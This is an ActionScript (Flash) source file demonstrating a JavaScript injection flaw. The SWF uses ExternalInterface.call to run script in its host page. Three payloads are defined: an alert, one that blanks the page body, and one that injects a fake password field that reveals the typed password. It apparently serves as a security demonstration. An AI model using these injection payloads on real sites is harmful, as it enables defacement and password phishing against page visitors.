/*
Security Issue: Javascript Injection
Roy McElmurry
8/4/2010	
*/

package  {
	import flash.display.Sprite;
	import flash.system.Security;
	import flash.external.ExternalInterface;
	
	[SWF(backgroundColor="#ffffff", frameRate="24", width="550", height="400")]
	public class SecurityIssue extends Sprite {
		
		private const ANNOYING:String = '' +
			'function() {' +
			'	alert("hahaha");' +
			'}';
			
		private const MEAN:String = '' +
			'function() {' +
			'	document.getElementsByTagName("body")[0].innerHTML = "";' +
			'	alert("pwned");' +
			'}';
			
		private const MALICIOUS:String = '' +
			'function() {' +
			'	var label = document.createElement("label");' +
			'	var pass = document.createElement("input");' +
			'	pass.setAttribute("type", "password");' +
			'	pass.setAttribute("onblur", "alert(\\\"Got your password fool: \\\" + this.value)");' +
			'	label.appendChild(pass);' +
			'	label.innerHTML = "Password: " + label.innerHTML;' +
			'	document.getElementsByTagName("body")[0].appendChild(label);' +
			'}';
		
		public function SecurityIssue():void {
			Security.allowDomain("localhost");
			if (ExternalInterface.available) {
				ExternalInterface.call(MALICIOUS);
			}
		}
	}
}